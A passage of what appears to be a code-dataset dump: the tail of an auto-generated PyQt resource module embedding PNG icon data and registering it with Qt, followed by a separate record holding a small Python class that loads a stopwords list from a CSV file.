\x89\x93\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\
\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\x8b\x88\x92\x8d\x8a\x93\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x93\x91\
\x9a\x8c\x89\x93\x8b\x88\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8b\
\x88\x92\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\
\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xaa\xa9\xaf\
\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8b\x88\x92\x8f\x8c\
\x96\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8c\
\x89\x93\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\x8b\x88\x92\x8b\x88\
\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\
\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\
\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\
\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8e\x8c\x95\xae\xad\xb3\
\xaa\xa9\xaf\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\x8b\
\x88\x92\x8c\x8a\x93\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\
\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\
\x88\x92\x8f\x8c\x95\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\x8b\x89\x92\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\
\x90\x8d\x96\x8b\x88\x92\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\x92\xae\
\xad\xb3\x00\x00\x00\xb1\xc2\x75\x92\x00\x00\x00\xa6\x74\x52\x4e\
\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x03\x13\x15\x15\x14\x06\x2a\xc2\xcf\xcf\xce\
\x49\x18\x14\x45\xfb\x6f\x07\x14\x23\xbc\xb9\x2b\x6b\xfe\x91\x02\
\x12\xbf\x2a\xbe\xd5\xa9\xe8\xee\xa7\xb8\xc7\x11\xb8\xc6\x1e\x08\
\x94\xc0\x19\xba\xf4\xf4\xdb\x31\xa1\xdf\x79\x3d\x3c\x75\xb5\x03\
\x05\x41\x65\x86\xeb\x3d\x36\xd9\xed\x71\x47\x2b\x04\xca\x6e\xfb\
\xc3\x13\xce\xf4\x34\xf0\xd0\x15\xcf\x3b\x33\xef\xcf\xc5\xfd\x74\
\x69\xfe\x04\x30\x4e\xea\xdb\x35\x2f\xd5\xf2\x96\x4b\xab\xd9\x6d\
\x33\x33\xb1\x05\x25\xf0\xef\xc1\x17\xb1\x9a\x0a\x1a\xc3\xc8\x29\
\xc6\xc4\xad\xef\xb7\xd7\xc1\x9f\x02\x8a\x7c\x04\x2c\xba\xcc\x17\
\x0b\x51\x16\x21\xcc\x15\x04\x0d\xb7\x9c\xe1\x00\x00\x00\x01\x62\
\x4b\x47\x44\x00\x88\x05\x1d\x48\x00\x00\x00\x09\x70\x48\x59\x73\
\x00\x00\x00\x64\x00\x00\x00\x64\x00\x0f\x96\xc5\xdd\x00\x00\x00\
\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\x30\x1e\x4a\x5a\xd3\x78\
\x00\x00\x01\x8a\x49\x44\x41\x54\x28\xcf\x63\x60\x80\x02\x46\x11\
\x51\x31\x71\x09\x49\x26\x06\x24\xc0\x08\x06\x52\xd2\x32\xb2\x72\
\xf2\xcc\x4c\x4c\x4c\x2c\xac\x70\x71\x05\x45\x46\x46\x25\xe5\x65\
\xcb\x57\xa8\x30\x33\xa9\xaa\x31\xb3\xb1\x42\xc5\xd5\x35\x34\xb5\
\x18\xb5\x75\x80\x12\xba\x7a\xfa\xba\x06\x86\xcc\xec\xac\x60\x09\
\x75\xa3\x95\x2b\x8d\x4d\x4c\x57\x02\x25\xcc\xcc\x2d\x56\xac\xb0\
\x34\x64\xe6\x00\x49\x58\x59\xaf\x84\x00\xa0\x04\x04\xd8\xd8\x72\
\x82\x24\xec\xec\xd1\x25\x1c\x1c\x99\xc0\x46\x29\x3a\x41\x24\x9c\
\x5d\x20\xe2\xae\x6e\xcc\xcc\x10\xb7\xba\x83\x84\x3d\x3c\xbd\xbc\
\x7d\x5c\x41\x12\xbe\x7e\xcc\x9c\x4c\x0c\xfe\x01\x81\x41\xc1\x20\
\xf1\x10\x46\x2e\x6e\x8e\xd0\x30\xa0\x44\x78\x44\x64\x54\x34\x83\
\x68\x0c\xc4\x1c\x4f\xa0\x4e\x56\x1e\x8e\x58\xb0\x61\x71\xf1\x09\
\x0c\x8a\x89\x60\xf1\xa4\x10\x46\x46\x06\x06\x56\xa6\xe4\x14\xb0\
\x4c\x6a\x1a\x83\x62\x3a\x44\x22\x03\x24\xc1\xcb\x94\x99\x05\x96\
\xc8\x4e\x63\x10\xcd\xc9\x05\xcb\xe4\x01\x8d\xe2\xe5\x63\xce\x2f\
\x00\x4b\xc8\x49\x30\x14\x16\x15\xe7\x95\x00\x25\x4a\xcb\x80\x96\
\xf3\x97\x57\x00\x45\x2b\xab\x22\xaa\x25\xc1\xce\xad\x01\x69\xa9\
\xad\xab\x6f\xc8\x07\x89\xaf\x68\x6c\x62\x86\x78\xa4\x19\x62\x8d\
\x4e\x4b\x2b\xc4\x9c\xb6\x76\x26\xb0\xcf\xad\x3a\xd0\x83\xa4\xb3\
\x0b\x2c\xd1\xdd\x83\x2e\xd1\x0b\x0d\xab\xbe\xfe\x95\x2b\x27\x4c\
\x9c\x04\x92\xc8\x9a\x3c\x05\xe8\x24\x37\x66\x01\x48\x44\x49\x4d\
\x9d\xd6\x3d\x7d\x06\x48\x62\xe6\xac\xd9\x73\xe6\xba\x31\x0b\x0a\
\x41\xa3\x70\xde\x7c\x46\xc6\x40\xa0\x44\xc1\x02\x66\xe6\x85\x8b\
\x98\x05\x79\x90\x13\x43\xc0\x62\x19\x59\xcb\x4c\x66\x60\x6a\x10\
\xe6\x41\x49\x2a\xfe\x8a\x62\x4b\x12\x96\x32\xc3\xf8\x00\x2f\x5c\
\xba\x88\xe8\x0b\x3a\x2c\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\
\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\x30\
\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x31\x38\x2b\x30\x30\
\x3a\x30\x30\x3b\x07\x47\xd8\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x32\x30\x2d\
\x30\x35\x2d\x30\x32\x54\x30\x31\x3a\x32\x38\x3a\x35\x35\x2b\x30\
\x30\x3a\x30\x30\x48\x1e\x77\xe4\x00\x00\x00\x20\x74\x45\x58\x74\
\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\
\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\
\xbc\xcf\x1d\x9d\x00\x00\x00\x63\x74\x45\x58\x74\x73\x76\x67\x3a\
\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x20\x47\x65\x6e\x65\x72\x61\x74\
\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\x6c\x75\x73\x74\
\x72\x61\x74\x6f\x72\x20\x31\x39\x2e\x30\x2e\x30\x2c\x20\x53\x56\
\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\x67\x2d\x49\x6e\
\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\x6f\x6e\x3a\x20\
\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\x29\x20\x20\xce\
\x48\x90\x0b\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\
\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\
\x67\x68\x74\x00\x35\x38\x37\x2e\x25\x1c\x47\x00\x00\x00\x17\x74\
\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\
\x3a\x57\x69\x64\x74\x68\x00\x35\x38\x37\xbd\xd4\x4c\x1a\x00\x00\
\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\
\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\
\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x38\x38\x33\x38\x32\x39\
\x33\x35\x93\xf3\x7b\x53\x00\x00\x00\x12\x74\x45\x58\x74\x54\x68\
\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x33\x32\x37\x36\x32\x42\
\x50\x47\x06\xdb\x00\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\
\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\
\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\
\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\
\x2f\x66\x69\x6c\x65\x73\x2f\x31\x32\x35\x2f\x31\x32\x35\x37\x33\
\x32\x38\x2e\x70\x6e\x67\xf9\x67\xb6\x19\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\xd2\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x06\x00\x00\x00\xe0\x77\x3d\xf8\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x06\
\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\xa7\x93\x00\x00\
\x00\x09\x70\x48\x59\x73\x00\x00\x0d\xd7\x00\x00\x0d\xd7\x01\x42\
\x28\x9b\x78\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\
\x30\x34\x91\xe1\x1a\xae\x00\x00\x05\x5d\x49\x44\x41\x54\x48\xc7\
\xdd\x95\x4d\x88\x9d\x57\x19\xc7\x7f\xef\xf7\x7d\xe7\xde\xb9\x33\
\x99\xef\xc9\x24\x4d\x1a\xd3\x4e\x1d\x9b\x59\x44\x0c\xba\xb0\x68\
\xa0\x76\x15\x37\x8a\xb8\x30\x45\x44\x10\xf1\x03\x5c\x99\x4d\x11\
\x04\x17\x82\x0b\x91\x5a\xe8\xca\x8d\x90\xd2\x9d\x8a\x22\xb8\xb2\
\xa2\x42\x5b\xd2\x26\xd1\x26\x69\x12\x93\x4c\xe6\xde\x99\xb9\x33\
\x73\xe7\x7e\xbf\xf7\x7d\xcf\x39\xcf\xe3\xe2\xde\x49\x8d\x58\x71\
\xed\x03\x7f\xce\xe1\x2c\xce\xef\xf9\x3f\xcf\x73\x38\x1e\x1f\x12\
\x2f\x7f\xeb\x02\xf1\xec\x71\x6c\xb7\x49\x69\x66\x99\x22\x9c\x60\
\xd0\xef\x91\xed\xd7\xf1\x87\x1d\xde\x7a\xd0\xe2\xfc\x33\x0b\x7c\
\xfb\x95\xdf\xf0\xdf\x22\xf8\x4f\x87\x3f\xff\xee\x17\x90\xce\x0e\
\xd3\xab\x9f\x64\x3e\x36\x95\x81\x84\x9f\xe8\x75\xbb\xe7\x8b\xac\
\x77\xd6\x13\x37\x9d\x52\xb4\xfb\x1a\x0f\xe7\x13\xcb\xf9\xb3\x4f\
\xf3\x87\x2b\x77\x3e\x14\xe0\xbd\x72\xf9\x75\xa6\xaa\x55\x96\x66\
\x67\xa9\xa4\x29\xbe\xef\xd3\xdb\xba\xcf\x9d\x95\x17\x28\xfd\xee\
\xa5\xcf\xde\xdf\x6e\x5e\xda\xdd\x6f\x7e\x5c\x55\x13\x0f\x3c\x67\
\x8d\xf1\xd5\xfd\x2d\x25\xff\xc9\x8f\xcf\xd5\x7f\xfd\xdb\x13\x3f\
\xd0\x78\xf6\x18\x59\x96\xd1\xed\x76\xd9\xdf\x6f\xb2\x59\xab\x71\
\xfb\xf6\x1d\xb6\xb7\xea\x84\x9e\xe7\x79\x61\x10\x44\x49\x14\xf9\
\xe5\x34\xf5\xe3\x28\xf2\x67\xd6\xce\xb2\xf9\xfa\x0f\x9f\xbf\x7e\
\xb7\xf6\xf2\x20\xcf\xcb\x9f\x3a\xff\xc2\x70\xe5\xe4\xe9\xe0\xc1\
\x83\x87\xfe\xb5\x2b\x6f\xe9\xee\x83\xdb\x67\x3b\xd6\xfd\xe2\x7b\
\x7f\x5d\xbe\xf4\x95\xf3\x6b\xbf\xea\x0d\x32\xf2\x3c\x17\x40\x44\
\x45\x44\x44\x55\xd5\x01\x7d\xef\xa7\xbf\x7c\xed\xa4\xc0\x8f\x82\
\x20\x58\x4c\xe3\x24\xf4\x7d\x2f\xf2\x86\xfd\x70\xf3\xca\x9f\x4f\
\x1d\x74\xbb\x73\x5f\xfc\xea\x37\xf3\xd5\xd5\xd5\xa4\xdd\xe9\xf2\
\xc6\x9f\xfe\xc2\xb5\xbf\xdf\xa0\xdb\x69\xd9\x41\xed\x56\xe8\x99\
\xac\x37\xf5\xc4\x47\xeb\x2d\xe3\xbb\x7c\x98\x4b\x5e\xe4\xae\xc8\
\x73\xc9\xf3\x42\xf2\x3c\xaf\x5b\x53\x7c\x27\x0c\xc3\x60\x32\x2b\
\xcc\xf3\x85\xb1\xf3\x59\x36\xc4\x39\xc1\x6f\x6f\x53\xaf\xd7\xf8\
\xf4\xe7\xbf\xc4\xfa\xb3\xcf\x26\x9e\x07\x6d\x55\xaa\xd5\x0a\x73\
\x33\x47\xf0\x83\x20\xcc\xba\x4b\xf4\x36\xde\xab\xec\xdf\xb8\xfe\
\x74\x93\x49\x54\x05\x54\x51\x55\x00\x54\x75\x09\x95\x52\x98\x26\
\x09\xb9\x71\xd6\x88\xc5\x59\x87\x88\x45\x5a\x7b\x04\x49\xca\xd2\
\xb1\x13\x74\x7a\x7d\xac\xb3\x38\x11\xd2\x52\x89\xea\x64\x85\xbc\
\x28\x28\x4d\x4e\xd3\xf1\x23\xc8\x33\x82\xb8\x8c\x11\x1d\x03\xe4\
\x10\xe0\x50\x25\x34\x85\x51\x15\xc1\x5a\x8b\x38\x41\xac\xc5\x64\
\x19\x7e\x10\xb2\x77\xd0\xe6\xee\xc6\x43\x92\x28\x22\x0a\x03\xc4\
\x39\xc2\x30\xc0\xf7\x3d\x02\xdf\xc7\x29\x38\x6b\x20\x12\x54\x14\
\x18\x03\x14\x14\x05\x15\xc2\x41\x96\x21\xa2\xe3\xec\x05\x67\x1d\
\x8a\x47\x31\x1c\xb0\xf1\x70\x93\x61\x5e\x50\x99\x48\x99\x48\x12\
\x0e\x5a\x6d\xb2\x6c\x88\x29\x0a\xac\x29\x28\x86\x7d\xc0\xc3\x89\
\xa0\x87\xe5\x51\x41\x47\x16\x46\x80\x7e\x96\x11\x04\x11\xce\x5a\
\x54\x15\xe3\x04\xa2\x14\xc9\x07\x34\x36\xee\x12\x97\x26\x28\x8a\
\x82\x2c\x8e\x69\xec\xed\xd1\x6a\xb5\xc9\x86\x39\xed\xdd\x3a\xc3\
\x5e\x87\x64\x6a\x0e\x6b\x05\xe5\x10\x70\xd8\x87\xd1\x3e\xcc\xb2\
\x21\x49\x02\xce\x39\x54\x15\x67\x2d\x52\xaa\x12\xa5\x65\x1a\xb7\
\xae\x82\x1f\x32\xbb\x72\x82\x34\x49\x68\xec\xee\x8d\x66\x7d\x7b\
\x93\xbd\x7b\x37\x48\xfc\x90\x5c\x13\xac\x38\xfc\x51\xdd\xc7\xa5\
\xf9\x17\x40\x51\x18\x3c\x3f\xc0\x5a\x87\x8a\xe0\xac\xc5\x12\x12\
\x2e\x9c\x84\xee\x75\xee\xbf\xfd\x47\x76\xee\x2d\x92\x56\x67\x69\
\xee\x36\xe8\x36\x1b\xf4\x9b\x3b\x94\xf1\xf8\xcc\x62\x99\x5b\x7d\
\xc3\xbd\xb0\x4a\xd3\xf4\x1f\xcb\x5e\x55\xf1\x50\x42\x63\x0c\x41\
\x10\x8c\x32\x17\xc5\x5a\x87\x73\x0e\x1b\x4d\x52\x39\x75\x06\x7d\
\x78\x9b\xf6\xd6\x06\x3b\xff\xb8\x89\x35\x16\x51\x21\x2a\x4d\x50\
\x89\x27\xa8\x86\xc2\x7a\xf5\x34\x13\xfd\x9c\x1b\x31\x34\xb2\xce\
\xa3\xcc\x0f\xfb\x10\x5a\x6b\xb1\xc6\x62\x9d\x43\x9c\xe0\xdc\x08\
\x20\xce\x61\xfd\x94\xe0\xe8\x33\x1c\x99\x3d\x8e\x1b\xf6\x11\x51\
\x0e\x0e\x0e\xd8\xda\xd9\xe5\xc0\x78\x4c\xf5\x16\x58\x4d\x53\x3e\
\x32\x59\x46\xdb\x82\xc4\x8e\xc6\x70\x0c\x19\x0d\x2b\xa1\x73\x0e\
\xeb\x1c\xce\x5a\x9c\x93\xb1\x93\xf1\x34\xe9\xc8\x91\x25\x42\xa2\
\x2a\x22\xc2\xc0\xb5\x31\xd6\x81\x07\xef\x99\x26\xa1\xe7\xf3\x84\
\x5f\xe6\x58\x5c\x41\x73\x41\x4b\x4a\x23\x6b\x8f\x5d\x28\xa1\xb3\
\x0e\x17\xd8\x0f\xc6\xd4\x09\x22\x0e\xeb\xec\xbf\x39\x92\x31\xd8\
\xa2\x2a\x78\x78\xb4\xf3\x1e\xef\x8a\x83\x64\x91\xa3\x12\xb3\xa0\
\x09\x4a\x15\x2d\x09\x8d\xac\xed\x21\x82\x2f\xce\x79\x6e\x24\x8c\
\xb1\x38\x67\xc7\xcd\x1e\xbb\xb2\x6e\x24\x37\x5a\xc5\xb9\x0f\x5e\
\xac\x42\x3b\xef\xf3\xce\x70\x8b\xba\x5f\x20\x4e\x38\x52\xf8\xac\
\x6a\x95\xc9\x30\xd1\xcc\xe4\x9e\x6f\x8a\xc2\x16\x79\xd1\x36\x85\
\x79\xfc\x42\xeb\x46\x0d\xb7\xf6\xd1\xe5\xce\x8d\x5c\x1e\x3e\x2a\
\x55\xc1\xf3\xa0\x3d\xec\xf1\xce\x70\x8b\x9d\xd8\xe1\xfb\xb0\x5a\
\xda\xeb\x2d\x98\x9d\x57\x37\xb6\x5b\xb5\x70\x6f\xab\x76\x57\x94\
\x17\x81\x73\x61\x14\xaf\x07\x61\xb4\xe6\x07\xe1\x49\x55\xe6\x14\
\x12\x15\x79\x54\xba\xc3\xbd\xa2\x78\x80\xaa\xa0\x82\x35\x45\xde\
\xa8\x75\xda\x37\x8b\xb8\x7b\xed\x73\x4b\xcb\xd1\xf2\x74\xfd\xed\
\xa7\x1a\xf7\x2e\xbf\x76\xf1\xb9\x3c\x4c\xcb\xe5\x62\x7e\xf9\xd8\
\x9b\x5f\xfb\xfe\x4b\x6f\x9e\x9b\xf2\xc2\x99\xf9\xc5\xe9\x85\x95\
\xe3\x2b\xe5\xc9\xa9\xd5\xb8\x94\x9e\x89\xe2\xe4\x4c\x10\x44\x4f\
\xf9\x41\xb0\xec\xfb\x41\x55\x55\x02\x67\x6d\x6e\x4d\xb1\x93\xf5\
\xfb\xef\x0f\x07\xfd\x77\x07\xbd\xee\xd5\x22\xcf\x6f\xd5\x61\xf3\
\xea\xfb\x57\x9b\xaa\x97\xf3\x9b\xcf\x7d\x9d\x2f\xff\xec\x0d\xbc\
\xc7\xbe\x37\xcf\x63\x61\xe5\x38\xa7\xd7\xd6\xb9\x70\xf1\x1b\x5c\
\xba\x78\xc1\x07\x2a\x33\xf3\x4b\x0b\xd5\x23\xb3\xa7\xca\xd5\xa9\
\xb5\x3c\xeb\x2f\xed\xed\xd4\x6a\xfd\x76\xe7\xbe\x31\x45\x03\x68\
\x01\x9d\xb1\xb2\xf5\xa3\x73\xd2\xec\xb5\xd8\xec\x58\xfe\xa7\x08\
\xa3\x88\x27\x57\x3f\xc6\xab\xbf\xbf\x02\xe0\x03\xd1\x58\xf1\x58\
\xe1\xf8\xfc\xff\x34\xfe\x09\x50\xc9\xce\x14\x61\x6a\x10\x46\x00\
\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x63\x72\x65\x61\
\x74\x65\x00\x32\x30\x32\x30\x2d\x30\x37\x2d\x31\x39\x54\x30\x33\
\x3a\x33\x39\x3a\x31\x39\x2b\x30\x30\x3a\x30\x30\x9d\x70\x4c\x6c\
\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x6d\x6f\x64\
\x69\x66\x79\x00\x32\x30\x31\x39\x2d\x30\x31\x2d\x30\x38\x54\x31\
\x37\x3a\x35\x34\x3a\x30\x36\x2b\x30\x30\x3a\x30\x30\xfa\xae\x64\
\x88\x00\x00\x00\x20\x74\x45\x58\x74\x73\x6f\x66\x74\x77\x61\x72\
\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6d\x61\x67\x65\x6d\
\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\xbc\xcf\x1d\x9d\x00\x00\x00\
\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x44\x6f\x63\x75\
\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\x73\x00\x31\xa7\xff\xbb\
\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\
\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\x67\x68\x74\x00\x35\x31\
\x32\x8f\x8d\x53\x81\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\
\x00\x35\x31\x32\x1c\x7c\x03\xdc\x00\x00\x00\x19\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\
\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\
\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\
\x65\x00\x31\x35\x34\x36\x39\x37\x30\x30\x34\x36\xc4\x38\x95\x8f\
\x00\x00\x00\x13\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\
\x69\x7a\x65\x00\x31\x35\x32\x30\x39\x38\x42\xe5\x15\x0c\xcb\x00\
\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\
\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\
\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\
\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\
\x73\x2f\x31\x30\x36\x2f\x31\x30\x36\x36\x32\x33\x38\x2e\x70\x6e\
\x67\x39\x3a\x2a\x0d\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\
\x82\
"
qt_resource_name = b"\
\x00\x03\
\x00\x00\x77\x47\
\x00\x70\
\x00\x6e\x00\x67\
\x00\x04\
\x00\x06\xfa\x5e\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\
\x00\x0b\
\x05\xff\xda\x07\
\x00\x31\
\x00\x31\x00\x33\x00\x37\x00\x32\x00\x36\x00\x34\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0e\
\x02\xd3\xb9\x87\
\x00\x64\
\x00\x65\x00\x61\x00\x6c\x00\x20\x00\x73\x00\x6d\x00\x61\x00\x6c\x00\x6c\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x07\
\x09\xc7\x57\xa7\
\x00\x73\
\x00\x65\x00\x74\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0b\
\x0f\x29\x4e\xc7\
\x00\x70\
\x00\x72\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x01\x74\x56\xe3\x3f\xc3\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x68\x2e\xd5\xff\x38\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x01\x74\xc4\x73\x3a\x8f\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
\x00\x00\x01\x74\xc4\x73\xad\x43\
"
# Pick the resource-struct layout matching the Qt runtime: Qt < 5.8 only
# understands the version-1 table, while newer Qt expects version 2
# (whose entries carry an extra 8-byte field, visible in the tables above).
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
    rcc_version = 1
    qt_resource_struct = qt_resource_struct_v1
else:
    rcc_version = 2
    qt_resource_struct = qt_resource_struct_v2
def qInitResources():
    # Register the embedded resource data with Qt's resource system so the
    # images are reachable via ":/..." paths.
    QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
    # Mirror of qInitResources: remove the embedded data from Qt's registry.
    QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
# Generated modules register their resources as a side effect of import.
qInitResources()
|
8,119 | dad4e14da734f2e2329f4cbe064c73c82a4ae27c | import os as os
import io as io
import re
class Stopwords:
def __init__(self, base_dir='data'):
self.base_dir = base_dir
def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):
# Load stopwords from file.
if base_dir is not None:
self.base_dir = base_dir
filename = os.path.join(self.base_dir, stopwords_file)
self.stopwords = []
pattern = re.compile('[\r\n]')
with open(filename, 'r', encoding='utf-8') as fin:
self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin]
return self.stopwords |
